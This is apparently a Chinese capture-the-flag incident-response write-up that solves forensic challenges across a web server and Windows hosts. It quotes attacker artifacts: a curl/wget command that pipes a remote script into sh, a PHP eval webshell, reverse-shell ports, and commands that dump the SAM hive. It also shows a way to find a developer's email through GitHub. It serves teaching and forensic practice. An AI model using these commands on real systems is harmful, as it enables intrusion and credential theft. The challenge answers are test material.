跳到主要内容

第二届帕鲁杯-应急响应

应急响应1-1

登录webserver,在/var/www/html,找到a.php

查看nginx的日志,/var/log/nginx

192.168.31.240 - - [02/May/2025:00:10:10 -0700] "POST /a.php HTTP/1.1" 200 114 "-" "Opera/9.80 (Windows NT 6.1; WOW64; U; pt) Presto/2.10.229 Version/11.62"
192.168.31.240 - - [02/May/2025:00:10:28 -0700] "POST /a.php HTTP/1.1" 200 168 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr-FR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"

攻击ip地址1为:

192.168.31.240
root@ubuntu:/var/www/html# stat a.php 
File: 'a.php'
Size: 62 Blocks: 8 IO Block: 4096 regular file
Device: 801h/2049d Inode: 153285 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2025-05-16 18:04:31.537138360 -0700
Modify: 2025-05-01 21:09:51.615011437 -0700
Change: 2025-05-01 21:09:51.615011437 -0700
Birth: -

应急响应1-2

webserver切换到root用户,查看历史命令记录.bash_history

root用户的命令日志

image-20250517094940504

(curl -fsSL -m180 http://192.168.31.11:8084/slt||wget -T180 -q http://192.168.31.11:8084/slt)|sh

攻击ip地址2:

192.168.31.11

应急响应1-3

题目描述

题解攻击者暴力破解开始时间。 flag为:palu{xx:xx:xx:xx}

有几个docker容器,查看日志

image-20250523210359551

docker logs 6801404902b1 | grep '192.168.31.240'

前面是正常访问,2025:03:05:58开始爆破

image-20250523210602488

应急响应1-4

windows10的计划任务,找到flag1

image-20250517231351750

palu{pc3_zgsfqwerlkssaw}

应急响应1-5

通过计划任务,找到C:\Program Files (x86)\Microsoft\a.bat

image-20250517231513154

查看a.bat

image-20250517141047033

palu{nizhidaowoyouduoainima}

应急响应1-6

找到数据库密码:TOOR@123

image-20250517231906998

登录mysql server,找到flag3

image-20250517092832240

查看订单内容,base64解码

[{"item_id":1,"item_name":"flag3palu{sqlaabbccsbwindows}","quantity":2,"price":199.99},{"item_id":3,"item_name":"英国复印","quantity":1,"price":59.99}]
flag3palu{sqlaabbccsbwindows}

应急响应1-7

在回收站找到,钓鱼文件是简历.exe

image-20250517142655667

palu{2977CDAB8F3EE5EFDDAE61AD9F6CF203}

image-20250517151524215

应急响应1-8

题目描述

提交攻击者留下的webshell-1密码

格式为:palu{xxxx}

webserver的webdata容器中的木马

image-20250523210751370

hack

应急响应1-9

题目描述

提交攻击者开放端口 格式为:palu{xxx,xxx,xxx}

根目录反弹 shell:192.168.31.11:1133

PC2 传简历给 PC1 横向 192.168.31.11:8084

webserver 的/tmp/r.sh 下存在反弹 shell:192.168.31.11:1144

palu{1133,1144,8084}

应急响应1-10

查看a.php

image-20250517162706631

<?php eval($_POST["00232"]); ?>

应急响应1-11

题目描述

提交攻击者留下的隐藏账户的密码

flag格式为:palu{xxxx}

将sam文件dump下来,解密

reg save hklm\sam sam.hive
reg save hklm\system system.hive

c227b82bdaf223965e36d2402178ae6

NTLM hash

dbae99beb48fd9132e1cf77f4c746979

wmx_love

应急响应1-12

查看木马文件中的字符串

strings Project2.exe

C:\Users\n0k4u\source\repos\Project2\x64\Debug\Project2.pdb

找到一个idn0k4u,github搜索

只需要在这个URL的末尾加上.patch,就可以看到纯文本形式的Commit记录。而开发者的邮箱地址就在上面,如下图所示:

https://github.com/n0k4u/whatthis/commit/9fde50f0bc13cc2bf916ecc95ca912bc7f0cd114.patch

image-20250517192623103

n0k4u@outlook.com

或者通过在这个接口访问

https://api.github.com/users/<name>/events/public

image-20250523211615388

参考:

https://kingname.info/2024/06/02/find-email-of-github/

应急响应1-13

C:\Users\n0k4u\source\repos\Project2\x64\Debug\Project2.pdb

github搜索id,找到该用户

https://github.com/n0k4u/whatthis

日记:
2025年5月1日,我想和王美欣宝贝51出去玩,但是他说他要加班。。。。。
51还要加班?我要入侵他们公司服务器看看真假。。。。

好吧,你果然没有加班,你永远也别想抛开我,永远,我说的是永远!!!!

密语:3834239649

是个qq号

355d74f936afa9eb9c96254b14625c3

palu{loveyouibiejv}

solar_Linux后门排查

题目描述

跳板机疑似被遗留后门,请排查 1、找到可疑进程完整路径 2、找到被横向的服务器IP 3、连接被横向服务器 flag格式为 flag{完整路径|服务器IP|服务器中flag文本}

查看进程

image-20250524214527036

/usr/lib/systemd/systemd-login

找到外联IP

image-20250524214607141

49.232.112.164

直接SSH连接

image-20250524214634295

palu{/usr/lib/systemd/systemd-login|49.232.112.164|ZX0001S}